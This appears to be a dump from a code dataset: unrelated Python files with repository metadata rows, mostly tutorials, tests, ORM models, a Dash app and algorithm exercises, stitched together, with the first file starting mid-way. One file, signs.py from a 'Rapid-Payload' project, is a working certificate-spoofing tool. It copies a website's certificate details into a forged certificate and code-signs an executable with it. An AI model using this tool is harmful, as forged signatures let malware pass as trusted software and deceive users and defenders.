# Bind three attributes
s.name = 'Michael'
s.age = 25
# AttributeError: 'Student' object has no attribute 'score'
# s.score = 99
# Has no effect on inheriting subclasses
class GraduateStudent(Student):
pass
g = GraduateStudent()
g.score = 9999
print(g.score)
| 13.458333 | 65 | 0.70485 |
1980e7cae20af40233dbc3e1774fd4148042bddb | 451 | py | Python | Cracking_the_Coding_Interview/linked_lists_detect_a_cycle.py | byung-u/HackerRank | 4c02fefff7002b3af774b99ebf8d40f149f9d163 | ["MIT"] | null | null | null | Cracking_the_Coding_Interview/linked_lists_detect_a_cycle.py | byung-u/HackerRank | 4c02fefff7002b3af774b99ebf8d40f149f9d163 | ["MIT"] | null | null | null | Cracking_the_Coding_Interview/linked_lists_detect_a_cycle.py | byung-u/HackerRank | 4c02fefff7002b3af774b99ebf8d40f149f9d163 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
def has_cycle(head):
curr = head
seen = set()
while curr:
if curr in seen:
return True
seen.add(curr)
curr = curr.next
return False
# Much better to understand: Floyd's two-pointer (fast/slow) cycle detection
def has_cycle(head):
    fast = head
    while fast is not None and fast.next is not None:
        fast = fast.next.next
        head = head.next
        if head == fast:
            return True
    return False
| 18.791667 | 47 | 0.543237 |
d0e5c87d206ae13427676218f0cd8cf00afd7dc9 | 2,259 | py | Python | src/onegov/user/models/role_mapping.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | ["MIT"] | null | null | null | src/onegov/user/models/role_mapping.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | ["MIT"] | null | null | null | src/onegov/user/models/role_mapping.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | ["MIT"] | null | null | null |
from onegov.core.orm import Base
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UUID
from onegov.user.models.group import UserGroup
from onegov.user.models.user import User
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Text
from sqlalchemy.orm import backref
from sqlalchemy.orm import relationship
from uuid import uuid4
class RoleMapping(Base, ContentMixin, TimestampMixin):
""" Defines a generic role mapping between user and/or group and any
other model (content).
The model does not define the relationship to the content. Instead, the
    relationship should be defined in the content model when needed::
role_mappings = relationship(
RoleMapping,
primaryjoin=(
"and_("
"foreign(RoleMapping.content_id) == cast(MyModel.id, TEXT),"
"RoleMapping.content_type == 'my_models'"
")"
),
viewonly=True
)
"""
__tablename__ = 'role_mappings'
#: the type of the item, this can be used to create custom polymorphic
#: subclasses of this class. See
#: `<http://docs.sqlalchemy.org/en/improve_toc/\
#: orm/extensions/declarative/inheritance.html>`_.
type = Column(Text, nullable=True)
__mapper_args__ = {
'polymorphic_on': type
}
#: the id of the role mapping
id = Column(UUID, nullable=False, primary_key=True, default=uuid4)
#: the role is relevant for security in onegov.core
role = Column(Text, nullable=False)
#: the group this mapping belongs to
group_id = Column(UUID, ForeignKey(UserGroup.id), nullable=True)
group = relationship(
UserGroup, backref=backref('role_mappings', lazy='dynamic')
)
#: the user this mapping belongs to
username = Column(Text, ForeignKey(User.username), nullable=True)
user = relationship(
User, backref=backref('role_mappings', lazy='dynamic')
)
#: the content this mapping belongs to
content_id = Column(Text, nullable=False)
#: the content type (table name) this mapping belongs to
content_type = Column(Text, nullable=False)
| 32.271429 | 76 | 0.684816 |
de1af118f8154041eb169fa93ae07d197413fdc9 | 420 | py | Python | projects/g3h2-algorithm/practice2/4_max_sum.py | keybrl/xdu-coursework | 9d0e905bef28c18d87d3b97643de0d32f9f08ee0 | ["MIT"] | null | null | null | projects/g3h2-algorithm/practice2/4_max_sum.py | keybrl/xdu-coursework | 9d0e905bef28c18d87d3b97643de0d32f9f08ee0 | ["MIT"] | null | null | null | projects/g3h2-algorithm/practice2/4_max_sum.py | keybrl/xdu-coursework | 9d0e905bef28c18d87d3b97643de0d32f9f08ee0 | ["MIT"] | null | null | null |
def max_sum(d):
res = d[0]
max_i = 0
max_j = 1
i = 0
j = 0
max_count = 0
for item in d:
max_count += item
j += 1
if max_count > res:
res = max_count
max_i, max_j = i, j
if max_count <= 0:
max_count = 0
i = j
return res, max_i, max_j
if __name__ == '__main__':
print(max_sum([-2, 11, -4, 13, -5, -2]))
| 18.26087 | 44 | 0.442857 |
de58a3502bf8f5f03eefe7dc12701270d623da2b | 37 | py | Python | zencad/internal_models/__init__.py | Spiritdude/zencad | 4e63b1a6306dd235f4daa2791b10249f7546c95b | ["MIT"] | 5 | 2018-04-11T14:11:40.000Z | 2018-09-12T19:03:36.000Z | zencad/internal_models/__init__.py | Spiritdude/zencad | 4e63b1a6306dd235f4daa2791b10249f7546c95b | ["MIT"] | null | null | null | zencad/internal_models/__init__.py | Spiritdude/zencad | 4e63b1a6306dd235f4daa2791b10249f7546c95b | ["MIT"] | null | null | null |
from .knight import knight as knight
| 18.5 | 36 | 0.810811 |
c20f4544dcae0f2ae1155940864d2e8c71ea5217 | 721 | py | Python | packages/watchmen-storage/src/watchmen_storage/storage_exception.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null | packages/watchmen-storage/src/watchmen_storage/storage_exception.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null | packages/watchmen-storage/src/watchmen_storage/storage_exception.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null |
# noinspection DuplicatedCode
class InsertConflictException(Exception):
pass
class OptimisticLockException(Exception):
pass
class UnexpectedStorageException(Exception):
pass
class UnsupportedCriteriaException(UnexpectedStorageException):
pass
class UnsupportedComputationException(UnexpectedStorageException):
pass
class UnsupportedStraightColumnException(UnexpectedStorageException):
pass
class NoFreeJoinException(UnexpectedStorageException):
pass
class NoCriteriaForUpdateException(UnexpectedStorageException):
pass
class UnsupportedSortMethodException(UnexpectedStorageException):
pass
class EntityNotFoundException(Exception):
pass
class TooManyEntitiesFoundException(Exception):
pass
| 16.386364 | 69 | 0.859917 |
e413b3fc667b1726d6c8e96795d74b5e9453b03d | 1,788 | py | Python | Packs/PenfieldAI/Scripts/PenfieldAssign/PenfieldAssign_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | ["MIT"] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/PenfieldAI/Scripts/PenfieldAssign/PenfieldAssign_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | ["MIT"] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/PenfieldAI/Scripts/PenfieldAssign/PenfieldAssign_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | ["MIT"] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z |
"""Base Script for Cortex XSOAR - Unit Tests file
Pytest Unit Tests: all funcion names must start with "test_"
More details: https://xsoar.pan.dev/docs/integrations/unit-testing
MAKE SURE YOU REVIEW/REPLACE ALL THE COMMENTS MARKED AS "TODO"
"""
import demistomock as demisto
import json
import io
from PenfieldAssign import penfield_assign, main
# from pytest import *
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
# DUMMY DATA
fake_analyst_ids = 'admin,person'
fake_category = 'fake_cat'
fake_created = 'fake_date'
fake_id = 'fake_id'
fake_name = 'fake_name'
fake_severity = 'Low'
# TODO: REMOVE the following dummy unit test function
fake_response = [{
'Contents': 'test_user'
}]
def test_penfield_assign(mocker):
# this overwrite the command call
mocker.patch.object(demisto, 'executeCommand', return_value=fake_response)
assert penfield_assign(
analyst_ids=fake_analyst_ids,
category=fake_category,
created=fake_created,
id=fake_id,
name=fake_name,
severity=fake_severity
) == fake_response
def test_main(mocker):
mock_users = util_load_json('test_data/test_2_users.json')
mock_incident = util_load_json('test_data/test_incident.json')
# overwrite get users, incidents, and args
mocker.patch.object(demisto, 'executeCommand', return_value=mock_users)
mocker.patch.object(demisto, 'incidents', return_value=mock_incident)
mocker.patch.object(demisto, 'args', return_value={'assign': "No"})
mocker.patch('PenfieldAssign.penfield_assign', return_value=fake_response)
mocker.patch.object(demisto, 'results')
main()
assert demisto.results.call_args.args[0] == 'penfield suggests: test_user'
| 27.9375 | 78 | 0.730984 |
29a345463c7da327be480a650107205a6fc27321 | 813 | py | Python | 2_Iterables/Dicts/dict_comprehensions.py | felixdittrich92/Python3 | 16b767465e4bdf0adc652c195d15384bb9faa4cf | ["MIT"] | 1 | 2022-03-02T07:16:30.000Z | 2022-03-02T07:16:30.000Z | 2_Iterables/Dicts/dict_comprehensions.py | felixdittrich92/Python3 | 16b767465e4bdf0adc652c195d15384bb9faa4cf | ["MIT"] | null | null | null | 2_Iterables/Dicts/dict_comprehensions.py | felixdittrich92/Python3 | 16b767465e4bdf0adc652c195d15384bb9faa4cf | ["MIT"] | null | null | null |
# key: value
dict1 = {x: x**2 for x in range(10)}
print(dict1)
# only even numbers
dict2 = {x: x**2 for x in range(10) if x % 2 == 0}
print(dict2)
# if > 5 square it, otherwise raise to the power 1/2
dict3 = {x: x**2 if x > 5 else x**(1/2) for x in range(10) if x % 2 == 0}
print(dict3)
friends = ['hans', 'peter', 'max']
friend_keys = ['firstname', 'lastname', 'birthday']
"""
my_friend_dict = {
'hans': {'firstname': None, 'lastname': None, 'birthday': None},
'peter': {'firstname': None, 'lastname': None, 'birthday': None},
'max': {'firstname': None, 'lastname': None, 'birthday': None}
}
print(my_friend_dict)
"""
# as a dict comprehension
my_friend_dict2 = {friend_name: {key: None for key in friend_keys} for friend_name in friends}
print(my_friend_dict2)
| 30.111111 | 94 | 0.599016 |
d9b0b5556ed264e01bd32d0132833c9d2bbf2371 | 2,652 | py | Python | Rapid-Payload-main/signs.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | ["Apache-2.0"] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | Rapid-Payload-main/signs.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | ["Apache-2.0"] | null | null | null | Rapid-Payload-main/signs.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | ["Apache-2.0"] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z |
#!/usr/bin/python3
# auto - signs for CarbonCOpy[paranoidninja] in RapidPayload
from OpenSSL import crypto
from sys import argv, platform
from pathlib import Path
import shutil
import ssl
import os
import subprocess
TIMESTAMP_URL = "http://sha256timestamp.ws.symantec.com/sha256/timestamp"
print("\033[1m\033[36m")
def CarbonCopy(host, port, signee, signed):
try:
#Fetching Details
ogcert = ssl.get_server_certificate((host, int(port)))
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)
certDir = Path('certs')
certDir.mkdir(exist_ok=True)
#Creating Fake Certificate
CNCRT = certDir / (host + ".crt")
CNKEY = certDir / (host + ".key")
PFXFILE = certDir / (host + ".pfx")
#Creating Keygen
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
cert = crypto.X509()
#Setting Cert details from loaded from the original Certificate
cert.set_version(x509.get_version())
cert.set_serial_number(x509.get_serial_number())
cert.set_subject(x509.get_subject())
cert.set_issuer(x509.get_issuer())
cert.set_notBefore(x509.get_notBefore())
cert.set_notAfter(x509.get_notAfter())
cert.set_pubkey(k)
cert.sign(k, 'sha256')
CNCRT.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
CNKEY.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
try:
pfx = crypto.PKCS12()
except AttributeError:
pfx = crypto.PKCS12Type()
pfx.set_privatekey(k)
pfx.set_certificate(cert)
pfxdata = pfx.export()
PFXFILE.write_bytes(pfxdata)
if platform == "win32":
shutil.copy(signee, signed)
subprocess.check_call(["signtool.exe", "sign", "/v", "/f", PFXFILE,
"/d", "MozDef Corp", "/tr", TIMESTAMP_URL,
"/td", "SHA256", "/fd", "SHA256", signed])
else:
args = ("osslsigncode", "sign", "-pkcs12", PFXFILE,
"-n", "Notepad Benchmark Util", "-i", TIMESTAMP_URL,
"-in", signee, "-out", signed)
subprocess.check_call(args)
except Exception as ex:
print("[X] Something Went Wrong!\n[X] Exception: " + str(ex))
def main():
if len(argv) != 5:
print("[+] Descr: Impersonates the Certificate of a website\n[!] Usage: " + argv[0] + " <hostname> <port> <build-executable> <signed-executable>\n")
else:
CarbonCopy(argv[1], argv[2], argv[3], argv[4])
if __name__ == "__main__":
main()
| 32.740741 | 156 | 0.607089 |
8aaebae5da2aaee6af5f2259534930c89f52dd32 | 3,589 | py | Python | packages/watchmen-data-kernel/src/watchmen_data_kernel/storage/raw_data_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null | packages/watchmen-data-kernel/src/watchmen_data_kernel/storage/raw_data_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null | packages/watchmen-data-kernel/src/watchmen_data_kernel/storage/raw_data_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | ["MIT"] | null | null | null |
from typing import Any, Dict, List, Optional
from watchmen_data_kernel.topic_schema import TopicSchema
from watchmen_model.admin import Factor
from watchmen_model.pipeline_kernel import TopicDataColumnNames
from watchmen_storage import EntityCriteriaExpression, EntityRow, EntityShaper
from watchmen_utilities import ArrayHelper
from .data_entity_helper import TopicDataEntityHelper
from .data_service import TopicDataService
from .factor_column_mapper import TopicFactorColumnMapper
from .shaper import TopicShaper
class RawTopicFactorColumnMapper(TopicFactorColumnMapper):
def get_factors(self, schema: TopicSchema) -> List[Factor]:
return ArrayHelper(schema.get_flatten_factors()).map(lambda x: x.get_factor()).to_list()
class RawTopicShaper(TopicShaper):
def create_factor_column_mapper(self, schema: TopicSchema) -> TopicFactorColumnMapper:
return RawTopicFactorColumnMapper(schema)
def serialize(self, data: Dict[str, Any]) -> EntityRow:
row = self.serialize_fix_columns(data)
row[TopicDataColumnNames.RAW_TOPIC_DATA.value] = data.get(TopicDataColumnNames.RAW_TOPIC_DATA.value)
ArrayHelper(self.get_mapper().get_factor_names()).each(lambda x: self.serialize_factor(data, x, row))
return row
def deserialize(self, row: EntityRow) -> Dict[str, Any]:
data = self.deserialize_fix_columns(row)
data[TopicDataColumnNames.RAW_TOPIC_DATA.value] = row.get(TopicDataColumnNames.RAW_TOPIC_DATA.value)
ArrayHelper(self.get_mapper().get_column_names()).each(lambda x: self.deserialize_column(row, x, data))
return data
class RawTopicDataEntityHelper(TopicDataEntityHelper):
def create_entity_shaper(self, schema: TopicSchema) -> EntityShaper:
return RawTopicShaper(schema)
def is_versioned(self) -> bool:
return False
def find_version(self, data: Dict[str, Any]) -> int:
"""
always return -1
"""
return -1
def build_version_criteria(self, data: Dict[str, Any]) -> Optional[EntityCriteriaExpression]:
return None
def assign_version(self, data: Dict[str, Any], version: int) -> None:
"""
do nothing, raw topic has no version column
"""
pass
class RawTopicDataService(TopicDataService):
def try_to_wrap_to_topic_data(self, data: Dict[str, Any]) -> Dict[str, Any]:
self.delete_reversed_columns(data)
def wrap_flatten_factor(factor: Factor, from_data: Dict[str, Any], to_data: Dict[str, Any]) -> None:
name = factor.name
# copy flatten value to wrapped data
to_data[name] = from_data.get(name)
if name.find('.') != -1 and name in from_data:
del from_data[name]
wrapped_data = {TopicDataColumnNames.RAW_TOPIC_DATA.value: data}
# retrieve flatten factors
flatten_factors = self.schema.get_flatten_factors()
ArrayHelper(flatten_factors) \
.map(lambda x: x.get_factor()) \
.each(lambda x: wrap_flatten_factor(x, data, wrapped_data))
return wrapped_data
# return {TopicDataColumnNames.RAW_TOPIC_DATA.value: data}
def try_to_unwrap_from_topic_data(self, topic_data: Dict[str, Any]) -> Dict[str, Any]:
unwrapped_data = {}
# remove flatten factors
reserved_keys = [
TopicDataColumnNames.ID.value,
TopicDataColumnNames.TENANT_ID.value,
TopicDataColumnNames.INSERT_TIME.value,
TopicDataColumnNames.UPDATE_TIME.value
]
for key, value in topic_data.items():
if key in reserved_keys:
unwrapped_data[key] = value
if TopicDataColumnNames.RAW_TOPIC_DATA.value in topic_data:
pure_data = topic_data.get(TopicDataColumnNames.RAW_TOPIC_DATA.value)
if pure_data is not None:
for key, value in pure_data.items():
unwrapped_data[key] = value
return unwrapped_data
| 35.89 | 105 | 0.775704 |
6a52eb6a44e77af60b2317f2c0310c050671c217 | 1,902 | py | Python | webapp/dash_tutorial_plotly/basic_callbacks/slider_example.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | ["MIT"] | null | null | null | webapp/dash_tutorial_plotly/basic_callbacks/slider_example.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | ["MIT"] | null | null | null | webapp/dash_tutorial_plotly/basic_callbacks/slider_example.py | zeroam/TIL | 43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1 | ["MIT"] | null | null | null |
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import pandas as pd
df = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/gapminderDataFiveYear.csv')
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div([
dcc.Graph(id="graph-with-slider"),
dcc.Slider(
id="year-slider",
min=df["year"].min(),
max=df["year"].max(),
value=df["year"].min(),
marks={str(year): str(year) for year in df["year"].unique()},
step=None,
)
])
@app.callback(
Output("graph-with-slider", "figure"),
[Input("year-slider", "value")])
def update_figure(selected_year):
filtered_df = df[df.year == selected_year]
traces = []
for i in filtered_df.continent.unique():
df_by_continent = filtered_df[filtered_df["continent"] == i]
traces.append(dict(
x=df_by_continent['gdpPercap'],
y=df_by_continent['lifeExp'],
text=df_by_continent['country'],
mode='markers',
opacity=0.7,
marker={
"size": 15,
"line": {"width": 0.5, "color": "white"}
},
name=i,
))
return {
"data": traces,
"layout": dict(
xaxis={"type": "log", "title": "GDP Per Capita",
"range": [2.3, 4.8]},
yaxis={"title": "Life Expectancy", "range": [20, 90]},
margin={"l": 40, "b": 40, "t": 10, "r": 10},
legend={"x": 0, "y": 1},
hovermode="closest",
transition={"duration": 500},
)
}
if __name__ == "__main__":
app.run_server(debug=True)
| 29.261538 | 103 | 0.538906 |
6a9afce5f6738a7bfc708ecfa9395d60aab99c5f | 1,279 | py | Python | py/jpy/src/test/python/jpy_translation_test.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | ["MIT"] | 55 | 2021-05-11T16:01:59.000Z | 2022-03-30T14:30:33.000Z | py/jpy/src/test/python/jpy_translation_test.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | ["MIT"] | 943 | 2021-05-10T14:00:02.000Z | 2022-03-31T21:28:15.000Z | py/jpy/src/test/python/jpy_translation_test.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | ["MIT"] | 29 | 2021-05-10T11:33:16.000Z | 2022-03-30T21:01:54.000Z |
# This file was modified by Deephaven Data Labs.
import unittest
import jpyutil
jpyutil.init_jvm(jvm_maxmem='512M', jvm_classpath=['target/test-classes'])
import jpy
class DummyWrapper:
def __init__(self, theThing):
self.theThing = theThing
def getValue(self):
return 2 * self.theThing.getValue()
def make_wrapper(type, thing):
return DummyWrapper(thing)
class TestTypeTranslation(unittest.TestCase):
def setUp(self):
self.Fixture = jpy.get_type('org.jpy.fixtures.TypeTranslationTestFixture')
self.assertIsNotNone(self.Fixture)
def test_Translation(self):
fixture = self.Fixture()
thing = fixture.makeThing(7)
self.assertEqual(thing.getValue(), 7)
self.assertTrue(repr(type(thing)) in ["<type 'org.jpy.fixtures.Thing'>", "<class 'org.jpy.fixtures.Thing'>"])
jpy.type_translations['org.jpy.fixtures.Thing'] = make_wrapper
thing = fixture.makeThing(8)
self.assertEqual(thing.getValue(), 16)
self.assertEqual(type(thing), type(DummyWrapper(None)))
jpy.type_translations['org.jpy.fixtures.Thing'] = None
self.assertEqual(fixture.makeThing(9).getValue(), 9)
if __name__ == '__main__':
print('\nRunning ' + __file__)
unittest.main()
| 29.744186 | 117 | 0.68491 |
7c1180c3dfd51ac5958b332866461de583ff034c | 608 | py | Python | ___Python/Jonas/Python/p02_datenstrukturen/m03_anwendung_woerterbuecher.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | ["Apache-2.0"] | null | null | null | ___Python/Jonas/Python/p02_datenstrukturen/m03_anwendung_woerterbuecher.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | ["Apache-2.0"] | null | null | null | ___Python/Jonas/Python/p02_datenstrukturen/m03_anwendung_woerterbuecher.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | ["Apache-2.0"] | null | null | null |
satz = "Fischers Fritze fischt frische Fische"
# 1 Frequency of the letter e
# Approach 1) for loop and a counter variable
zaehler = 0
for zeichen in satz:
if zeichen == "e":
zaehler += 1
print (zaehler)
# 2 Frequency distribution of the letters in the sentence
d = {}
for zeichen in satz:
if zeichen in d:
d[zeichen] += 1
else:
d[zeichen] = 1
print(d)
# Alternative (EAFP) using try/except; here it only runs for the last character from the loop above
try:
d[zeichen] += 1
except KeyError:
d[zeichen] = 1
print(d)
# 3 Sort by frequency
print(sorted(d)) #Lambdas
print(sorted(d.items(), key=lambda tupel: tupel[1], reverse=True))
| 19.612903 | 67 | 0.625 |
7cacdd2f038510eb6468dfd964cdb80fd7950f54 | 1,509 | py | Python | Algorithms/notes/cookies_brian.py | tobias-fyi/02_algorithms | ab1a8a07c3560ad66712992e3af906e8fd316fe2 | ["MIT"] | null | null | null | Algorithms/notes/cookies_brian.py | tobias-fyi/02_algorithms | ab1a8a07c3560ad66712992e3af906e8fd316fe2 | ["MIT"] | 8 | 2020-03-24T17:47:23.000Z | 2022-03-12T00:33:21.000Z | cs/lambda_cs/02_algorithms/Algorithms/notes/cookies_brian.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | ["MIT"] | null | null | null |
"""
Algorithms :: Practice - eating cookies
Cookie Monster can eat either 0, 1, 2, or 3 cookies at a time.
If he were given a jar of cookies with `n` cookies inside of it,
how many ways could he eat all `n` cookies in the cookie jar?
Implement a function `eating_cookies` that counts the number of
possible ways Cookie Monster can eat all of the cookies in the jar.
"""
# %%
import sys
# n = 5
# 1 1 1 1 1
# 1 1 1 2
# 1 1 2 1
# 1 2 1 1
# 2 1 1 1
# 1 1 3
# 1 3 1
# 3 1 1
# 1 2 2
# 2 1 2
# 2 2 1
# 2 3
# 3 2
# %%
# def eating_cookies(n: int, cache=None) -> int:
# # Base cases
# if n == 0:
# return 1
# if n == 1:
# return 1
# if n == 2:
# return 2
# if n == 3:
# return 4
# ec1 = eating_cookies(n - 1)
# ec2 = eating_cookies(n - 2)
# ec3 = eating_cookies(n - 3)
# return ec1 + ec2 + ec3
# eating_cookies(9)
# %%
# With cache
def eating_cookies(n: int, cache=None) -> int:
if cache is None:
cache = {}
# cache = {0: 1, 1: 1, 2: 2, 3: 4}
# Base cases
if n == 0:
return 1
elif n == 1:
return 1
elif n == 2:
return 2
elif n == 3:
return 4
    elif n in cache:
return cache[n]
else:
ec1 = eating_cookies(n - 1, cache)
ec2 = eating_cookies(n - 2, cache)
ec3 = eating_cookies(n - 3, cache)
cache[n] = ec1 + ec2 + ec3
return cache[n]
eating_cookies(15)
# %%
| 18.402439 | 67 | 0.520212 |
86fa8522f6c5465e7f7eb038298a112b9efcf0fa | 2,609 | py | Python | quark_core_api/core/workspace.py | arcticle/Quark | 17aa5b5869a9e9c7a04c1a371fef5998f33dc319 | ["MIT"] | null | null | null | quark_core_api/core/workspace.py | arcticle/Quark | 17aa5b5869a9e9c7a04c1a371fef5998f33dc319 | ["MIT"] | null | null | null | quark_core_api/core/workspace.py | arcticle/Quark | 17aa5b5869a9e9c7a04c1a371fef5998f33dc319 | ["MIT"] | null | null | null |
import os
from quark_core_api.context import WorkspaceContext, ExperimentContext
from quark_core_api.common import ContextInitializer
from quark_core_api.core import QuarkExperiment, Script
from quark_core_api.exceptions import InvalidContextException
class QuarkWorkspace(object):
def __init__(self, id, name, context):
if not isinstance(context, WorkspaceContext):
raise InvalidContextException(context)
self._id = id
self._name = name
self._context = context
self._experiments = {}
self._scripts = {}
self.__initialize__()
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def directory(self):
return self._context.directory
@property
def experiments(self):
return self._experiments
@property
def scripts(self):
return self._scripts.values()
def create_experiment(self, name):
result = self._context.create_experiment(name)
if result > 0:
xp = self._create_experiment_object(name)
self._experiments[name] = xp
return xp
def delete_experiment(self, name):
result = self._context.delete_experiment(name)
if result > 0:
del self._experiments[name]
def create_script(self, script_name, content):
result = self._context.create_script(script_name, content)
if result > 0:
scr = self._create_script_object(script_name)
self._scripts[script_name] = scr
return scr
def __initialize__(self):
filename = "{}.quark".format(self._name)
self._context.create_storage(filename)
for script_name in self._context.scripts:
self._scripts[script_name] = self._create_script_object(script_name)
for xp_name in self._context.experiments:
self._experiments[xp_name] = self._create_experiment_object(xp_name)
def _get_experiment_location(self, experiment_name):
return os.path.join(self._context.directory, "experiments", experiment_name)
def _create_script_object(self, script_name):
directory = os.path.join(self._context.directory, "scripts")
return Script(script_name, directory)
def _create_experiment_object(self, experiment_name):
xp_dir = self._get_experiment_location(experiment_name)
ctx = ExperimentContext(xp_dir, ContextInitializer.experiment)
args = (experiment_name, self._scripts, ctx)
return QuarkExperiment(*args)
| 29.988506 | 84 | 0.676504 |
d48c6aed5aec50042d6e584932d8e053cd809853 | 3,629 | py | Python | tests/ernie_text_matching/model.py | mukaiu/PaddleNLP | 0315365dbafa6e3b1c7147121ba85e05884125a5 | ["Apache-2.0"] | null | null | null | tests/ernie_text_matching/model.py | mukaiu/PaddleNLP | 0315365dbafa6e3b1c7147121ba85e05884125a5 | ["Apache-2.0"] | null | null | null | tests/ernie_text_matching/model.py | mukaiu/PaddleNLP | 0315365dbafa6e3b1c7147121ba85e05884125a5 | ["Apache-2.0"] | null | null | null |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
class PointwiseMatching(nn.Layer):
def __init__(self, pretrained_model, dropout=None):
super().__init__()
self.ptm = pretrained_model
self.dropout = nn.Dropout(dropout if dropout is not None else 0.1)
# num_labels = 2 (similar or dissimilar)
self.classifier = nn.Linear(self.ptm.config["hidden_size"], 2)
def forward(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
_, cls_embedding = self.ptm(input_ids, token_type_ids, position_ids,
attention_mask)
cls_embedding = self.dropout(cls_embedding)
logits = self.classifier(cls_embedding)
probs = F.softmax(logits)
return probs
class PairwiseMatching(nn.Layer):
def __init__(self, pretrained_model, dropout=None, margin=0.1):
super().__init__()
self.ptm = pretrained_model
self.dropout = nn.Dropout(dropout if dropout is not None else 0.1)
self.margin = margin
# hidden_size -> 1, calculate similarity
self.similarity = nn.Linear(self.ptm.config["hidden_size"], 1)
def predict(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
_, cls_embedding = self.ptm(input_ids, token_type_ids, position_ids,
attention_mask)
cls_embedding = self.dropout(cls_embedding)
sim_score = self.similarity(cls_embedding)
sim_score = F.sigmoid(sim_score)
return sim_score
def forward(self,
pos_input_ids,
neg_input_ids,
pos_token_type_ids=None,
neg_token_type_ids=None,
pos_position_ids=None,
neg_position_ids=None,
pos_attention_mask=None,
neg_attention_mask=None):
_, pos_cls_embedding = self.ptm(pos_input_ids, pos_token_type_ids,
pos_position_ids, pos_attention_mask)
_, neg_cls_embedding = self.ptm(neg_input_ids, neg_token_type_ids,
neg_position_ids, neg_attention_mask)
pos_embedding = self.dropout(pos_cls_embedding)
neg_embedding = self.dropout(neg_cls_embedding)
pos_sim = self.similarity(pos_embedding)
neg_sim = self.similarity(neg_embedding)
pos_sim = F.sigmoid(pos_sim)
neg_sim = F.sigmoid(neg_sim)
labels = paddle.full(shape=[pos_cls_embedding.shape[0]],
fill_value=1.0,
dtype='float32')
loss = F.margin_ranking_loss(pos_sim,
neg_sim,
labels,
margin=self.margin)
return loss
| 33.915888 | 77 | 0.606503 |
07cabae4faaff6e4fe9099e5b710debcc1f4036d
| 10,532 |
py
|
Python
|
rfvision/models/pose_estimators/articulation/optimization/utils.py
|
mvig-robotflow/rfvision
|
cc662f213dfe5a3e8864a6b5685a668a4436e397
|
[
"Apache-2.0"
] | 6 |
2021-09-25T03:53:06.000Z
|
2022-02-19T03:25:11.000Z
|
